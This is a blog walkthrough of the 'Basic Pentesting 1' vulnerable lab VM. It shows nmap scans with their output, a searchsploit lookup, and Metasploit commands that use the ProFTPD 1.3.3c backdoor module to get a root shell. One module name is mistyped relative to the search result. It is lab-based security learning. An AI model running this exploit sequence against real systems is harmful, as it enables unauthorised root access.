Basic Pentesting 1

In this post I’m going to try my hand at Basic Pentesting 1 by Josiah Pierce. For the purpose of this article, command line entries and results will be in italics.

First things first, let’s find it with nmap.

nmap 192.168.1.0/24 > nmap-network_results.

which (among other things turned up the following VM which was new to my network.

Nmap scan report for vtcsec.pyrrh1c.net (192.168.1.227)
Host is up (0.0012s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)

Interestingly, looks like it’s hostname is vtcsec (made a note of that…)  Aside from that I see ftp, ssh, and http open. Let’s get some more details with nmap.

nmap -sV -O 192.168.1.227 > nmap-sv-o-results.txt

Which produced the following results.

Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-05 11:32 EST
Nmap scan report for vtcsec.pyrrh1c.net (192.168.1.227)
Host is up (0.00094s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds

Ok, now we’ve got the versions of the services. Let’s see if there’s any low hanging fruit here. I’ll check searchsploit for the FTP server.

searchsploit proftpd 1.3.3c

The output didn’t copy neatly to this blog format, (I run URXVT, so it’s likely some unicode that won’t translate to ASCII neatly… whatever). I did find two options availabl, the one that interests me was “Backdoor Command Execution (metasploit). So let’s fire up metasploit and see what we can do.

msfconsole

Metasploit loads up

search ProFTPD

It runs and there it is: exploit/unix/ftp/proftpd_133c backdoor! This should be easy enough then.

use exploit/unix/ftp/pro_ftpd_133c
set rhost 192.168.1.227
exploit

Voila. I got a shell. Let’s see who I am.

whoami

I’m root. Well damn. That was easy. I’m quite certain there’s other ways in though. So next time I’ll try some other routes in. That’s all for now.

 

If you want to see some other vulnerable VM write-ups I’ve done check out the vulnerable VM category.

Leave a Reply

Your email address will not be published. Required fields are marked *